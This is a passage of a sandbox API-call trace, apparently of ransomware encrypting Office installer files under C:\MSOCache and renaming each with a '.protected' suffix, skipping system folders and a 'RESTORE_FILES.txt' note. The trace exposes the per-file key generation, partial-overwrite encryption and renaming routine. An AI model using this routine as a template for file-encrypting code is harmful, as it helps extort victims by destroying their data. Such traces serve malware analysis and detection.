returned 1 [0064.050] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0064.050] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Program Files") returned -1 [0064.050] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Program Files (x86)") returned -1 [0064.050] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="$Recycle.bin") returned 1 [0064.050] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="System Volume Information") returned -1 [0064.050] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0064.050] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".protected") returned 0x0 [0064.050] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="RESTORE_FILES.txt") returned -1 [0064.050] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.050] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.050] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.050] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0064.050] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".txt") returned 0x0 [0064.050] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0064.050] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".rar") returned 0x0 [0064.050] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0064.050] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".zip") returned 0x0 [0064.050] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.060] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.060] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.061] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0064.062] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.079] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.079] CloseHandle (hObject=0xb4) returned 1 [0064.080] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.protected") returned 89 [0064.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.protected")) returned 1 [0064.080] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.080] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0064.081] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Program Files") returned -1 [0064.081] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Program Files (x86)") returned -1 [0064.081] lstrcmpiW (lpString1="PidGenX.dll", lpString2="$Recycle.bin") returned 1 [0064.081] lstrcmpiW (lpString1="PidGenX.dll", lpString2="System Volume Information") returned -1 [0064.081] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0064.081] StrStrIW 
(lpFirst="PidGenX.dll", lpSrch=".protected") returned 0x0 [0064.081] lstrcmpW (lpString1="PidGenX.dll", lpString2="RESTORE_FILES.txt") returned -1 [0064.081] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.081] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.081] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.081] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0064.081] StrStrW (lpFirst="PidGenX.dll", lpSrch=".txt") returned 0x0 [0064.081] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0064.081] StrStrW (lpFirst="PidGenX.dll", lpSrch=".rar") returned 0x0 [0064.081] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0064.081] StrStrW (lpFirst="PidGenX.dll", lpSrch=".zip") returned 0x0 [0064.081] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.083] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.083] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.084] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.084] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.103] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.104] CloseHandle (hObject=0xb4) returned 1 [0064.104] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.protected") returned 88 [0064.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.protected")) returned 1 [0064.105] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.105] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0064.105] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Program Files") returned -1 [0064.105] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Program Files (x86)") returned -1 [0064.105] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$Recycle.bin") returned 1 [0064.105] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="System 
Volume Information") returned -1 [0064.105] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0064.105] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".protected") returned 0x0 [0064.105] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="RESTORE_FILES.txt") returned -1 [0064.105] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.105] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.105] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.106] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0064.106] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0064.106] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0064.106] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".rar") returned 0x0 [0064.106] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0064.106] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".zip") returned 0x0 [0064.106] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, 
lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.120] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.120] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.121] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.121] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.137] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.137] CloseHandle (hObject=0xb4) returned 1 [0064.138] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.protected") returned 101 [0064.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.protected")) returned 1 [0064.138] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.138] lstrcmpiW 
(lpString1="setup.exe", lpString2="Windows") returned -1 [0064.138] lstrcmpiW (lpString1="setup.exe", lpString2="Program Files") returned 1 [0064.138] lstrcmpiW (lpString1="setup.exe", lpString2="Program Files (x86)") returned 1 [0064.138] lstrcmpiW (lpString1="setup.exe", lpString2="$Recycle.bin") returned 1 [0064.138] lstrcmpiW (lpString1="setup.exe", lpString2="System Volume Information") returned -1 [0064.138] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0064.138] StrStrIW (lpFirst="setup.exe", lpSrch=".protected") returned 0x0 [0064.138] lstrcmpW (lpString1="setup.exe", lpString2="RESTORE_FILES.txt") returned 1 [0064.139] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.139] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.139] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.139] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0064.139] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0064.140] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0064.140] StrStrW (lpFirst="setup.exe", lpSrch=".rar") returned 0x0 [0064.140] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0064.140] StrStrW 
(lpFirst="setup.exe", lpSrch=".zip") returned 0x0 [0064.140] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.145] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.145] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.146] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.146] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.154] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.154] CloseHandle (hObject=0xb4) returned 1 [0064.155] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.protected") returned 86 [0064.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.protected")) returned 1 [0064.155] 
FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.155] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0064.156] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0064.156] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0064.156] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0064.156] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0064.156] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0064.156] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0064.156] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0064.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.156] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.156] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0064.156] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0064.156] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0064.156] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0064.156] lstrlenW 
(lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0064.156] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0064.156] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.179] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.179] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.180] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.180] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.180] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.180] CloseHandle (hObject=0xb4) returned 1 [0064.181] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0064.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.protected" 
(normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0064.181] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.181] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="Windows") returned -1 [0064.181] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="Program Files") returned 1 [0064.181] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="Program Files (x86)") returned 1 [0064.181] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="$Recycle.bin") returned 1 [0064.181] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="System Volume Information") returned 1 [0064.182] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0064.182] StrStrIW (lpFirst="VisiorWW.cab", lpSrch=".protected") returned 0x0 [0064.182] lstrcmpW (lpString1="VisiorWW.cab", lpString2="RESTORE_FILES.txt") returned 1 [0064.182] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.182] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.182] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.183] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0064.183] StrStrW (lpFirst="VisiorWW.cab", lpSrch=".txt") returned 0x0 [0064.183] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0064.183] StrStrW (lpFirst="VisiorWW.cab", lpSrch=".rar") returned 0x0 [0064.183] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0064.183] StrStrW (lpFirst="VisiorWW.cab", lpSrch=".zip") returned 0x0 [0064.183] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.201] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.201] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.217] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.217] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.243] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.243] CloseHandle (hObject=0xb4) returned 1 [0064.245] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.protected") returned 89 [0064.245] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All 